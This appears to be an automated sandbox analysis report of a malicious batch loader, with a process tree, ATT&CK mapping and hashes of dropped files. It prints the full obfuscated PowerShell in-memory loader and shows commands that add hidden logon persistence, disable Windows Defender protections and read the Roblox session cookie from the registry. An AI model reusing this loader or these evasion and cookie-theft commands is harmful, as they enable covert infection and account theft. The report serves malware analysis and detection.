C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1276

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1296

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1404

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1412

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1592

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1604

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1700

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1760

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1808

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1884

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1912

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1920

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1976

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1992

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
1⤵
PID:1852

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2080

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2296

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2328

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2352

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2360

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2508

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2568

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2972

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2564

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3312

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\4x loader.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3812
- - C:\Windows\system32\net.exe
    net file
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4140
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 file
      4⤵
      PID:216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QIZJ/fa36vhtj27ozFjL7g05WCcUpC8LyRKGfAzheCI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZVv8E75OjoswS6cd03dUWw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $nLrzP=New-Object System.IO.MemoryStream(,$param_var); $ZuaJS=New-Object System.IO.MemoryStream; $UKkLU=New-Object System.IO.Compression.GZipStream($nLrzP, [IO.Compression.CompressionMode]::Decompress); $UKkLU.CopyTo($ZuaJS); $UKkLU.Dispose(); $nLrzP.Dispose(); $ZuaJS.Dispose(); $ZuaJS.ToArray();}function execute_function($param_var,$param2_var){ $PHFYc=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SFSaA=$PHFYc.EntryPoint; $SFSaA.Invoke($null, $param2_var);}$yGKMo = 'C:\Users\Admin\AppData\Local\Temp\4x loader.bat';$host.UI.RawUI.WindowTitle = $yGKMo;$smymX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($yGKMo).Split([Environment]::NewLine);foreach ($pgxRZ in $smymX) { if ($pgxRZ.StartsWith('KeyfbtTtfpIEwotnLZXq')) { $naPbf=$pgxRZ.Substring(20); break; }}$payloads_var=[string[]]$naPbf.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:1556
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_997_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_997.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3100
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_997.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:4980
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_997.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3200
      - C:\Windows\system32\net.exe
        
        net file
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2024
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        7⤵
        
        PID:2820
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QIZJ/fa36vhtj27ozFjL7g05WCcUpC8LyRKGfAzheCI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZVv8E75OjoswS6cd03dUWw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $nLrzP=New-Object System.IO.MemoryStream(,$param_var); $ZuaJS=New-Object System.IO.MemoryStream; $UKkLU=New-Object System.IO.Compression.GZipStream($nLrzP, [IO.Compression.CompressionMode]::Decompress); $UKkLU.CopyTo($ZuaJS); $UKkLU.Dispose(); $nLrzP.Dispose(); $ZuaJS.Dispose(); $ZuaJS.ToArray();}function execute_function($param_var,$param2_var){ $PHFYc=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SFSaA=$PHFYc.EntryPoint; $SFSaA.Invoke($null, $param2_var);}$yGKMo = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_997.bat';$host.UI.RawUI.WindowTitle = $yGKMo;$smymX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($yGKMo).Split([Environment]::NewLine);foreach ($pgxRZ in $smymX) { if ($pgxRZ.StartsWith('KeyfbtTtfpIEwotnLZXq')) { $naPbf=$pgxRZ.Substring(20); break; }}$payloads_var=[string[]]$naPbf.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        6⤵
        
        PID:5112
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4972
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Command.bat" "
        7⤵
        
        PID:4736
        
        C:\Windows\system32\net.exe
        
        net file
        8⤵
        
        PID:4016
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        9⤵
        
        PID:692
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FwysrSAaFvkpYGzsT6O/S5eMkWCg1bBowjSAlFJoASA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3sJDCdEktqFLh8xdyxQUKg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GdyUz=New-Object System.IO.MemoryStream(,$param_var); $UiXtU=New-Object System.IO.MemoryStream; $HLEIw=New-Object System.IO.Compression.GZipStream($GdyUz, [IO.Compression.CompressionMode]::Decompress); $HLEIw.CopyTo($UiXtU); $HLEIw.Dispose(); $GdyUz.Dispose(); $UiXtU.Dispose(); $UiXtU.ToArray();}function execute_function($param_var,$param2_var){ $IBIaY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WCAzB=$IBIaY.EntryPoint; $WCAzB.Invoke($null, $param2_var);}$wunSX = 'C:\Users\Admin\AppData\Local\Temp\Command.bat';$host.UI.RawUI.WindowTitle = $wunSX;$XCEUs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($wunSX).Split([Environment]::NewLine);foreach ($YsGUK in $XCEUs) { if ($YsGUK.StartsWith('XPmoVERZhStvHviujjTr')) { $bvkRK=$YsGUK.Substring(20); break; }}$payloads_var=[string[]]$bvkRK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        8⤵
        
        PID:3052
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        8⤵
        Command and Scripting Interpreter: PowerShell
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:3852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_487_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_487.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1524
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_487.vbs"
        9⤵
        Checks computer location settings
        
        PID:2244
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_487.bat" "
        10⤵
        
        PID:2176
        
        C:\Windows\system32\net.exe
        
        net file
        11⤵
        
        PID:3396
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        12⤵
        
        PID:4340
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FwysrSAaFvkpYGzsT6O/S5eMkWCg1bBowjSAlFJoASA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3sJDCdEktqFLh8xdyxQUKg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GdyUz=New-Object System.IO.MemoryStream(,$param_var); $UiXtU=New-Object System.IO.MemoryStream; $HLEIw=New-Object System.IO.Compression.GZipStream($GdyUz, [IO.Compression.CompressionMode]::Decompress); $HLEIw.CopyTo($UiXtU); $HLEIw.Dispose(); $GdyUz.Dispose(); $UiXtU.Dispose(); $UiXtU.ToArray();}function execute_function($param_var,$param2_var){ $IBIaY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WCAzB=$IBIaY.EntryPoint; $WCAzB.Invoke($null, $param2_var);}$wunSX = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_487.bat';$host.UI.RawUI.WindowTitle = $wunSX;$XCEUs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($wunSX).Split([Environment]::NewLine);foreach ($YsGUK in $XCEUs) { if ($YsGUK.StartsWith('XPmoVERZhStvHviujjTr')) { $bvkRK=$YsGUK.Substring(20); break; }}$payloads_var=[string[]]$bvkRK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        11⤵
        
        PID:668
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        11⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops file in Drivers directory
        
        PID:5024
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        12⤵
        
        PID:3388
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3848
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        12⤵
        
        PID:4020
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        12⤵
        
        PID:728
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        12⤵
        
        PID:3828
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        13⤵
        
        PID:3848
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        12⤵
        
        PID:1352
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        12⤵
        
        PID:2348
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        12⤵
        
        PID:4752
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        12⤵
        
        PID:4852
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        12⤵
        Detects videocard installed
        
        PID:3848
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        
        PID:2292
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2292 -s 1208
        8⤵
        Program crash
        
        PID:1872

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Modifies data under HKEY_USERS
PID:2276

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:5012

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:1876

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:2160

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4792

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:5064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:1692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2292 -ip 2292
1⤵
PID:2024

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
a26df49623eff12a70a93f649776dab7

SHA1
efb53bd0df3ac34bd119adf8788127ad57e53803

SHA256
4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

SHA512
e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
fd748594505e3afeb58c4d6b1aa3f58c

SHA1
25d8b210546f132f5aaa7c16c2023c46f631b4de

SHA256
41537f88dbfaee6da789e34188a2ad3ade45372f878603790a2514b7ef0b061e

SHA512
97706e7d92ea07e3b68ebb53698fb8c110b37d4e38226393eb46a3c9aa446644eaaee391bd15e2e50c8ff842c239f89fc28656bb44d893347bcd9c0e91f81f72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
3KB

MD5
ffa01c2945596ac10b1bfc8bac0c0af8

SHA1
94878a11888266cf315482cccc84cb5b1b0ab2f4

SHA256
44ac906471a48f6bb18062191bf56188ada7c26b75677c9b0cef314022657bfb

SHA512
e7812fb4b9577926b456e69ad96207bf0709794a1a4bb5a1e8f9dccffce923faf7fa6783c66c7afcfcbe33a1977575b8f2acbcf303744f654aad01ebab4c531b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
005bc2ef5a9d890fb2297be6a36f01c2

SHA1
0c52adee1316c54b0bfdc510c0963196e7ebb430

SHA256
342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

SHA512
f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
12c844ed8342738dacc6eb0072c43257

SHA1
b7f2f9e3ec4aaf5e2996720f129cd64887ac91d7

SHA256
2afeb7db4e46d3c1524512a73448e9cd0121deec761d8aa54fa9fe8b56df7519

SHA512
e3de9103533a69cccc36cd377297ba3ec9bd7a1159e1349d2cc01ab66a88a5a82b4ee3af61fab586a0cdfab915c7408735439fd0462c5c2cc2c787cb0765766a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7de258379da8dd1b14ccac1452e33a56

SHA1
8db035e324abcfa29c7df7c8b32666fa7d10c7d6

SHA256
f17a296d6cd9df559f6ee8e6f37f13263bec540319e879bd99f89e6f400b73b3

SHA512
64fd396772b4951965099042be9bac12d213baff2c855a1523927b1010e3ed79fa9660e0228b3a4a1403e986e1d05d03a67ce707a03ba6c54c8960f7fdb7716d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
ba42012e626d8c04b25c5e8bcb49d58e

SHA1
4f542888067e87d2d4dd8ced7bc901abd60f819b

SHA256
0a3c73d3b3afc81747d415241a047a1cadd117a0536606b89e57ecf8836e40ff

SHA512
6678e24f430379c3c2ec0385fc02d0db9a65720072b57e4b36f23be65c82b4d3da2692e1bf0d575bdd59d5673fa1b64ab99d1881367af632bb89121b1981fe11

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cb5c30d213a938d76ea627a4d05a0111

SHA1
9618958b449d646cb833edefb01dd372f8f0f4b0

SHA256
387991a291e69339f9a6099b4e9c55e55e5c6409e2c8ec50aa7ddbe3025a39dc

SHA512
54ff985ae7f14cc1a3c02d502be4c57ffbc231394e6358c37a0b00513d660ac52198bd946b1972491df54870e8414f905f7d398f0787ee1fe6652e194c801f07

Download Submit
C:\Users\Admin\AppData\Local\Temp\Command.bat

Filesize
1.0MB

MD5
2115d9701ecfb6647aa14282f70a7162

SHA1
da630ffc488358e77a668e161cb1880bd69f7f0e

SHA256
eac2fe417e4a2dda7819ce73311cbc9f0367ebe040de8b60bcee6c0ff88241cb

SHA512
7d1a21fe3a1e37c5cc215ebde977bbe6d25ee850af2680f71da122e901b47a88eeb94d42cacc5e9c386973bd6cf54f70447983d8c2adba1ebb77d26557e09fad

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2u0aqeud.1eu.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_487.vbs

Filesize
124B

MD5
fc4c316402fe8efe35e20cd3d1145084

SHA1
24d389cb735a3ed22bc201820b120d00fbf1f4f0

SHA256
3533e4e01afc18112813de2597f88ee865f53bd18ad5fb65b6125ea7ee74ea7a

SHA512
31209ffcee5ebd34993252efde696f8dd30d1112ac8351d28cf121d16dd711924a294b87258f57352bdeda388a8f7ab9d49f8353e146b54e77c42802d0d97eac

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_997.bat

Filesize
1.5MB

MD5
5b956910d7d28f6ee2ccb59d4c7b402f

SHA1
e99a814ba0a8824a2bb1625b4e2cb0aa828d26e1

SHA256
52aac553901b56007d9b40870447423fef70802593722eebd3a7326635074aaa

SHA512
1967ce3eb6344695012c1ebb3c78a2a86396c900783907b7f383bb60a40e622ce52af6b813d3cf17686edae560da6d61462fb1d5f7446114ab9a1c9e61e3f635

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_997.vbs

Filesize
124B

MD5
e2d19b7eba6ee773fce81608f43cfa1a

SHA1
64a7d6ddd9bb209c68c4f7b5b9e6fc3e01c5325e

SHA256
1a29a4a858586cc3daf31849064735b1867e5c35377842963a0fc2a4f797f01a

SHA512
